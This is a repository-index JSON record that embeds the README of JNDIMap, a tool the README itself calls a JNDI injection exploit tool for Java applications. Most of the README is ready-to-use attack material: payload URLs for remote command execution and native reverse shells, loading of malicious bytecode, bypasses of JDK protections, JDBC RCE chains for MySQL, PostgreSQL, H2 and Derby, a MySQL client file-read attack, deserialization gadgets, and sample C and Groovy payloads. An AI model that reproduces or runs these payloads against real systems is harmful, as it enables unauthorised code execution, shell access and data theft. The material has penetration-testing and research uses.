{"id":13575626,"url":"https://github.com/X1r0z/JNDIMap","last_synced_at":"2025-04-04T22:31:40.071Z","repository":{"id":205786441,"uuid":"715077641","full_name":"X1r0z/JNDIMap","owner":"X1r0z","description":"JNDI 注入利用工具, 支持 RMI, LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式 | A JNDI injection exploit tool that supports RMI, LDAP and LDAPS protocols, including a variety of methods to bypass higher-version JDK","archived":false,"fork":false,"pushed_at":"2024-10-18T10:04:14.000Z","size":618,"stargazers_count":326,"open_issues_count":0,"forks_count":25,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-11-05T11:43:24.589Z","etag":null,"topics":["bypass","deserialize","java","jdbc","jndi","ldap","ldaps","rmi"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/X1r0z.png","metadata":{"files":{"readme":"README-en.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-11-06T12:42:03.000Z","updated_at":"2024-11-04T15:07:28.000Z","dependencies_parsed_at":"2024-01-05T05:29:24.170Z","dependency_job_id":"46d5193f-4998-4855-920a-431f25bedf28","html_url":"https://github.com/X1r0z/JNDIMap","commit_stats":null,"previous_names":["x1r0z/jndiexploit","x1r0z/jndimap"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/X1r0z%2FJNDIMap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/X1r0z%2FJNDIMap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/X1r0z%2FJNDIMap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/X1r0z%2FJNDIMap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/X1r0z","download_url":"https://codeload.github.com/X1r0z/JNDIMap/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247260742,"owners_count":20910069,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","deserialize","java","jdbc","jndi","ldap","ldaps","rmi"],"created_at":"2024-08-01T15:01:02.718Z","updated_at":"2025-04-04T22:31:35.062Z","avatar_url":"https://github.com/X1r0z.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"# JNDIMap\n\nJNDIMap is a JNDI injection exploit tool that supports RMI, LDAP and LDAPS protocols, including a variety of methods to bypass higher-version JDK\n\nFeatures\n\n- DNS Log\n- execute command\n- native reverse shell (Windows supported)\n- load custom class bytecode\n- Tomcat/Groovy/SnakeYaml bypass\n- Commons DBCP/Tomcat DBCP/Tomcat JDBC/Alibaba Druid/HikariCP JDBC RCE\n- NativeLibLoader (load native library)\n- MLet (detect classes in classpath)\n- LDAP(s) deserialization\n- custom JNDI payload (based on Groovy Language)\n\n## Build\n\nThere are no releases yet, so you need to build it manually. (JDK 8)\n\n```bash\ngit clone https://github.com/X1r0z/JNDIMap\ncd JNDIMap\nmvn package -Dmaven.test.skip=true\n```\n\n## Usage\n\n```bash\nUsage: java -jar JNDIMap.jar [-i \u003cip\u003e] [-r \u003crmiPort\u003e] [-l \u003cldapPort\u003e] [-s \u003cldapsPort\u003e] [-p \u003chttpPort\u003e] [-j \u003cjksPath\u003e] [-k \u003cjksPin\u003e] [-u \u003curl\u003e] [-f \u003cfile\u003e] [-useReferenceOnly] [-h]\n````\n\n`-i`: IP address to listen on (i.e. the codebase, must be specified as an IP that can be reached by the target, e.g. `192.168.1.100`, note that `0.0.0.0` is not available)\n\n`-r`: RMI server listening port, default is `1099`\n\n`-l`: LDAP server listening port, default is `1389`\n\n`-s`: LDAPS server listening port, default is `1636`\n\n`-p`: HTTP server listening port, default is `3456`\n\n`-j`: path to the JKS file, used to configure the LDAPS server\n\n`-k`: JKS password, no password if not specified\n\n`-u`: specify the JNDI route manually, e.g. `/Basic/Command/open -a Calculator` (The JNDI URL is not completely controllable in some cases)\n\n`-f`: path to the Groovy script, used to write custom JNDI payloads\n\n`-useReferenceOnly`: only applicable to LDAP protocol, directly returns Reference object through LDAP related parameters, used to bypass `com.sun.jndi.ldap.object.trustSerialData`\n\n`-h`: show usage\n\n## Feature\n\nPlease note that all the Base64 passed in is **Base64 URL encoded**, i.e. replace `+` and `/` with `-` and `_`\n\nMost parameters support automatic Base64 URL decoding, that is, you can directly pass in plain text (command/IP/port/URL) or Base64 URL encoded content (some routes only accept Base64 URL encoded parameters, which will be specially noted below)\n\nThe following routes support RMI, LDAP and LDAPS protocols except `/Deserialize/*` (LDAP(s) deserialization)\n\nFor the RMI protocol, simply replace `ldap://127.0.0.1:1389/` with `rmi://127.0.0.1:1099/` in the payload url\n\nFor the LDAPS protocol, simply replace `ldap://127.0.0.1:1389/` with `ldaps://127.0.0.1:1636/` in the payload url\n\n### Basic\n\nDirectly load remote classes via JNDI Reference\n\nThe Java version must be less than 8u121 (RMI protocol) or 8u191 (LDAP protocol)\n\n```bash\n# DNS request\nldap://127.0.0.1:1389/Basic/DNSLog/xxx.dnslog.cn\nldap://127.0.0.1:1389/Basic/DNSLog/eHh4LmRuc2xvZy5jbg==\n\n# execute command\nldap://127.0.0.1:1389/Basic/Command/open -a Calculator\nldap://127.0.0.1:1389/Basic/Command/b3BlbiAtYSBDYWxjdWxhdG9y\n\n# load custom class bytecode\n\n# load via URL parameters\nldap://127.0.0.1:1389/Basic/FromUrl/\u003cbase64-url-encoded-java-bytecode\u003e\n# load from the server running JNDIMap\nldap://127.0.0.1:1389/Basic/FromFile/Evil.class # the path is relative to the current directory\nldap://127.0.0.1:1389/Basic/FromFile/\u003cbase64-url-encoded-path-to-evil-class-file\u003e\n\n# native reverse shell (Windows supported)\nldap://127.0.0.1:1389/Basic/ReverseShell/127.0.0.1/4444\nldap://127.0.0.1:1389/Basic/ReverseShell/MTI3LjAuMC4x/NDQ0NA==\n```\n\n### Bypass\n\nUse the following methods to bypass higher-version JDK restrictions, support all Basic features\n\n- Tomcat ELProcessor\n- Groovy ClassLoader/Shell\n- SnakeYaml\n\nAll of the above methods rely on BeanFactory, so the Tomcat version must be less than 8.5.79\n\n```bash\n# Tomcat Bypass\nldap://127.0.0.1:1389/TomcatBypass/Command/open -a Calculator\n\n# Groovy Bypass\nldap://127.0.0.1:1389/GroovyClassLoader/Command/open -a Calculator\nldap://127.0.0.1:1389/GroovyShell/Command/open -a Calculator\n\n# SnakeYaml Bypass\nldap://127.0.0.1:1389/SnakeYaml/Command/open -a Calculator\n```\n\n### MLet\n\nDetect classes in classpath via MLet\n\nIf the class `com.example.TestClass` exists, the HTTP server will receive a `/com/example/TestClass_exists.class` request\n\n```bash\nldap://127.0.0.1:1389/MLet/com.example.TestClass\n```\n\n### NativeLibLoader\n\nLoad native library on the target server via NativeLibLoader\n\nYou need to write a dll/so/dylib to the target machine in advance by other methods (e.g. file upload)\n\nPlease note that the path passed in is an absolute path and cannot contain the file extension\n\nFor example: if `/tmp/evil.so` exists on the server, the path is `/tmp/evil`\n\n```bash\nldap://127.0.0.1:1389/NativeLibLoader/\u003cbase64-url-encoded-path-to-native-library\u003e\n```\n\nsource code of the native library, written in C\n\n```c\n#include \u003cstdlib.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n\n__attribute__ ((__constructor__)) void preload (void){\n    system(\"open -a Calculator\");\n}\n```\n\ncompile\n\n```bash\n# macOS\ngcc -shared -fPIC exp.c -o exp.dylib\n\n# Linux\ngcc -shared -fPIC exp.c -o exp.so\n```\n\n### JDBC RCE\n\nSupport JDBC RCE for the following database connection pools\n\n- Commons DBCP\n- Tomcat DBCP\n- Tomcat JDBC\n- Alibaba Druid\n- HikariCP\n\nReplace Factory in the URL with one of CommonsDBCP1/CommonsDBCP2/TomcatDBCP1/TomcatDBCP2/TomcatJDBC/Druid/HikariCP\n\n#### MySQL\n\n**MySQL JDBC Deserialization**\n\n```bash\n# detectCustomCollations (5.1.19-5.1.48, 6.0.2-6.0.6)\nldap://127.0.0.1:1389/Factory/MySQL/Deserialize1/127.0.0.1/3306/root\n\n# ServerStatusDiffInterceptor\n\n# 5.1.11-5.1.48\nldap://127.0.0.1:1389/Factory/MySQL/Deserialize2/127.0.0.1/3306/root\n\n# 6.0.2-6.0.6\nldap://127.0.0.1:1389/Factory/MySQL/Deserialize3/127.0.0.1/3306/root\n\n# 8.0.7-8.0.19\nldap://127.0.0.1:1389/Factory/MySQL/Deserialize4/127.0.0.1/3306/root\n```\n\nJDBC URL (for reference)\n\n```bash\n# detectCustomCollations (5.1.19-5.1.48, 6.0.2-6.0.6)\njdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true\u0026autoDeserialize=true\u0026user=123\n\n# ServerStatusDiffInterceptor\n\n# 5.1.11-5.1.48\njdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true\u0026statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=test\n\n# 6.0.2-6.0.6\njdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true\u0026statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=test\n\n# 8.0.7-8.0.19\njdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=test\n```\n\n**MySQL Client Arbitrary File Read**\n\n```bash\n# all versions\nldap://127.0.0.1:1389/Factory/MySQL/FileRead/127.0.0.1/3306/root\n```\n\nJDBC URL (for reference)\n\n```bash\n# all versions\njdbc:mysql://127.0.0.1:3306/test?allowLoadLocalInfile=true\u0026allowUrlInLocalInfile=true\u0026allowLoadLocalInfileInPath=/\u0026maxAllowedPacket=655360\n```\n\nThe above two methods require a malicious MySQL server to be used\n\n[https://github.com/4ra1n/mysql-fake-server](https://github.com/4ra1n/mysql-fake-server)\n\n[https://github.com/rmb122/rogue_mysql_server](https://github.com/rmb122/rogue_mysql_server)\n\n[https://github.com/fnmsd/MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server)\n\n#### PostgreSQL\n\nInstantiate ClassPathXmlApplicationContext via the socketFactory and socketFactoryArg parameters of the PostgreSQL JDBC URL to achieve RCE\n\n```bash\nldap://127.0.0.1:1389/Factory/PostgreSQL/Command/open -a Calculator\n````\n\n#### H2\n\nExecute SQL statements via the INIT parameter of the H2 JDBC URL, support command execution and native reverse shell\n\nSupport three methods: CREATE ALIAS + Java/Groovy, CREATE TRIGGER + JavaScript\n\n```bash\n# command execution\nldap://127.0.0.1:1389/Factory/H2/Java/Command/open -a Calculator\nldap://127.0.0.1:1389/Factory/H2/Groovy/Command/open -a Calculator\nldap://127.0.0.1:1389/Factory/H2/JavaScript/Command/open -a Calculator\n\n# native reverse shell (not support Groovy yet)\nldap://127.0.0.1:1389/Factory/H2/Java/ReverseShell/127.0.0.1/4444\nldap://127.0.0.1:1389/Factory/H2/JavaScript/ReverseShell/127.0.0.1/4444\n```\n\n#### Derby\n\n**Derby SQL RCE**\n\nSupport executing commands and native reverse shell\n\n```bash\n# 1. load remote jar and create procedures (will automatically create the database)\nldap://127.0.0.1:1389/Factory/Derby/Install/\u003cdatabase\u003e\n\n# 2. execute command/native reverse shell\nldap://127.0.0.1:1389/Factory/Derby/Command/\u003cdatabase\u003e/open -a Calculator\nldap://127.0.0.1:1389/Factory/Derby/ReverseShell/\u003cdatabase\u003e/ReverseShell/127.0.0.1/4444\n\n# 3. drop the database to release memory\nldap://127.0.0.1:1389/Factory/Derby/Drop/\u003cdatabase\u003e\n```\n\nPlease note that the connectionInitSql/initSQL parameter of HikariCP/TomcatJDBC does not support executing multiple SQL statements at once, so the **Install** process above needs to be written separately, taking HikariCP as an example\n\n```bash\n# 1. load remote jar (will automatically create the database)\nldap://127.0.0.1:1389/HikariCP/Derby/InstallJar/\u003cdatabase\u003e\n\n# 2. add the jar to the classpath\nldap://127.0.0.1:1389/HikariCP/Derby/AddClassPath/\u003cdatabase\u003e\n\n# 3. create a procedure to execute commands\nldap://127.0.0.1:1389/HikariCP/Derby/CreateCmdProc/\u003cdatabase\u003e\n\n# 4. create a procedure to execute native reverse shell\nldap://127.0.0.1:1389/HikariCP/Derby/CreateRevProc/\u003cdatabase\u003e\n\n# subsequent JNDI URL is the same as above\n```\n\nIn order to prevent malicious jars from landing, JNDIMap chooses to use the `jdbc:derby:memory:\u003cdatabase\u003e` form of JDBC URL to create the database in memory\n\nTherefore, it is best not to execute the Install/InstallJar route multiple times, and remember to Drop the database to release memory\n\n**Derby Master-Slave Replication Deserialization RCE**\n\nAlthough JNDI itself supports deserialization, it is not very meaningful, and may be useful in some extreme scenarios (e.g. filtering the LDAP protocol and only supporting RMI)\n\n```bash\n# 1. create an in-memory database\nldap://127.0.0.1:1389/Factory/Derby/Create/\u003cdatabase\u003e\n\n# 2. start the malicious Derby Server quickly using JNDIMap\njava -cp JNDIMap.jar map.jndi.server.DerbyServer -g \"/CommonsCollectionsK1/Command/open -a Calculator\"\n\n# 3. specify Slave information, database is the name of the database created above\nldap://127.0.0.1:1389/Factory/Derby/Slave/\u003cip\u003e/\u003cport\u003e/\u003cdatabase\u003e\n```\n\nStart the built-in malicious Derby Server\n\n```bash\nUsage: java -cp JNDIMap.jar map.jndi.server.DerbyServer [-p \u003cport\u003e] [-g \u003cgadget\u003e] [-f \u003cfile\u003e] [-h]\n```\n\n`-p`: Derby Server listening port, default is `4851`\n\n`-g`: specify gadget, e.g. `/CommonsCollectionsK1/Command/open -a Calculator` (i.e. `/Deserialize/*` series routes)\n\n`-f`: specify custom serialization data file\n\n`-h`: show usage\n\n### Deserialize\n\nSupports Java deserialization via LDAP(s) protocol (RMI protocol is not supported)\n\nJNDIMap has built-in the following gadgets, and also supports custom data deserialization\n\n- CommonsCollections K1-K4\n- CommonsBeanutils (1.8.3 + 1.9.4)\n- Fastjson (1.2.x + 2.0.x)\n- Jackson\n\n```bash\n# custom data deserialization\n\n# load via URL parameters\nldap://127.0.0.1:1389/Deserialize/FromUrl/\u003cbase64-url-encoded-serialized-data\u003e\n# load from the server running JNDIMap\nldap://127.0.0.1:1389/Deserialize/FromFile/payload.ser # the path is relative to the current directory\nldap://127.0.0.1:1389/Deserialize/FromFile/\u003cbase64-url-encoded-path-to-serialized-data\u003e\n\n# CommonsCollectionsK1 deserialization (3.1 + TemplatesImpl), supports command execution and native reverse shell\nldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/Command/open -a Calculator\nldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK1/ReverseShell/127.0.0.1/4444\n\n# CommonsCollectionsK2 deserialization (4.0 + TemplatesImpl), same as above\nldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK2/Command/open -a Calculator\n\n# CommonsCollectionsK3 deserialization (3.1 + Runtime.exec), only supports command execution\nldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK3/Command/open -a Calculator\n\n# CommonsCollectionsK4 deserialization (4.0 + Runtime.exec), same as above\nldap://127.0.0.1:1389/Deserialize/CommonsCollectionsK4/Command/open -a Calculator\n\n# CommonsBeanutils deserialization\n# No need for commons-collections dependency, use TemplatesImpl, support command execution and native reverse shell\n# According to the different serialVersionUID of BeanComparator, it is divided into two versions: 1.8.3 and 1.9.4\n\n# 1.8.3\nldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/Command/open -a Calculator\nldap://127.0.0.1:1389/Deserialize/CommonsBeanutils183/ReverseShell/127.0.0.1/4444\n\n# 1.9.4\nldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/Command/open -a Calculator\nldap://127.0.0.1:1389/Deserialize/CommonsBeanutils194/ReverseShell/127.0.0.1/4444\n\n# Jackson native deserialization\n# Use JdkDynamicAopProxy to optimize instability issues, need spring-aop dependency\nldap://127.0.0.1:1389/Deserialize/Jackson/Command/open -a Calculator\nldap://127.0.0.1:1389/Deserialize/Jackson/ReverseShell/127.0.0.1/4444\n\n# Fastjson native deserialization\n\n# Fastjson1: all versions (1.2.x)\nldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator\nldap://127.0.0.1:1389/Deserialize/Fastjson1/ReverseShell/127.0.0.1/4444\n\n# Fastjson2: \u003c= 2.0.26\nldap://127.0.0.1:1389/Deserialize/Fastjson2/Command/open -a Calculator\nldap://127.0.0.1:1389/Deserialize/Fastjson2/ReverseShell/127.0.0.1/4444\n```\n\n### Script\n\nJNDIMap supports writing custom JNDI payload scripts with [Groovy](https://groovy-lang.org/) language\n\nGroovy script (using H2 RCE as an example)\n\n```groovy\nimport javax.naming.Reference\nimport javax.naming.StringRefAddr\n\ndef list = []\nlist \u003c\u003c \"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\\\;return \\\"test\\\"\\\\;}'\"\nlist \u003c\u003c \"CALL EXEC('$args')\" // parameters are passed in through the args variable\n\n\ndef url = \"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=${list.join('\\\\;')}\\\\;\"\n\ndef ref = new Reference(\"javax.sql.DataSource\", \"com.zaxxer.hikari.HikariJNDIFactory\", null)\nref.add(new StringRefAddr(\"driverClassName\", \"org.h2.Driver\"))\nref.add(new StringRefAddr(\"jdbcUrl\", url))\n\nreturn ref // return Reference object\n```\n\nStart JNDIMap\n\n```bash\njava -jar JNDIMap.jar -f /path/to/evil.groovy\n```\n\nAchieve RCE via the following JNDI URL\n\n```bash\n# supports passing parameters to Groovy scripts manually\nldap://127.0.0.1:1389/Script/\u003cargs\u003e\n```\n\nIn some cases, the JNDI URL is not completely controllable, so you can specify the `-u` parameter\n\n```bash\njava -jar JNDIMap.jar -f /path/to/evil.groovy -u \"/Script/open -a Calculator\"\n```\n\nThen trigger via any JNDI URL\n\n```bash\nldap://127.0.0.1:1389/x\n```\n\n### useReferenceOnly\n\nFor JNDI injection of the LDAP(s) protocol, if you want to use ObjectFactory to bypass it, the existing methods are to set the javaSerializedData attribute returned by the LDAP protocol to the serialized data of the Reference object\n\nHowever, since JDK 21, the `com.sun.jndi.ldap.object.trustSerialData` parameter defaults to false, which means that deserialization cannot be triggered through the LDAP protocol, and the Reference object cannot be parsed through the above method\n\nBut we can still set the relevant LDAP parameters so that the server directly returns the Reference object. Because this process does not involve deserialization, it bypasses the restrictions of the trustSerialData parameter\n\nThe specific implementation is as follows\n\n```java\npublic void processSearchResult(InMemoryInterceptedSearchResult searchResult) {\n    // ......\n\n    Reference ref = (Reference) result;\n    e.addAttribute(\"objectClass\", \"javaNamingReference\");\n    e.addAttribute(\"javaClassName\", ref.getClassName());\n    e.addAttribute(\"javaFactory\", ref.getFactoryClassName());\n\n    Enumeration\u003cRefAddr\u003e enumeration = ref.getAll();\n    int posn = 0;\n\n    while (enumeration.hasMoreElements()) {\n        StringRefAddr addr = (StringRefAddr) enumeration.nextElement();\n        e.addAttribute(\"javaReferenceAddress\", \"#\" + posn + \"#\" + addr.getType() + \"#\" + addr.getContent());\n        posn ++;\n    }\n\n    // ......\n}\n```\n\nJust specify the `-useReferenceOnly` parameter when using it\n\n```bash\njava -jar JNDIMap.jar -useReferenceOnly\n```\n\n## Reference\n\n[https://tttang.com/archive/1405/](https://tttang.com/archive/1405/)\n\n[https://paper.seebug.org/1832/](https://paper.seebug.org/1832/)\n\n[https://xz.aliyun.com/t/12846](https://xz.aliyun.com/t/12846)\n\n[http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce](http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce)\n\n[https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson 与原生反序列化/](https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/)\n\n[https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson 与原生反序列化-二/](https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C/)\n\n[https://www.yulegeyu.com/2022/11/12/Java 安全攻防之老版本 Fastjson 的一些不出网利用/](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/)\n\n[https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/)\n\n[https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html](https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FX1r0z%2FJNDIMap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FX1r0z%2FJNDIMap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FX1r0z%2FJNDIMap/lists"}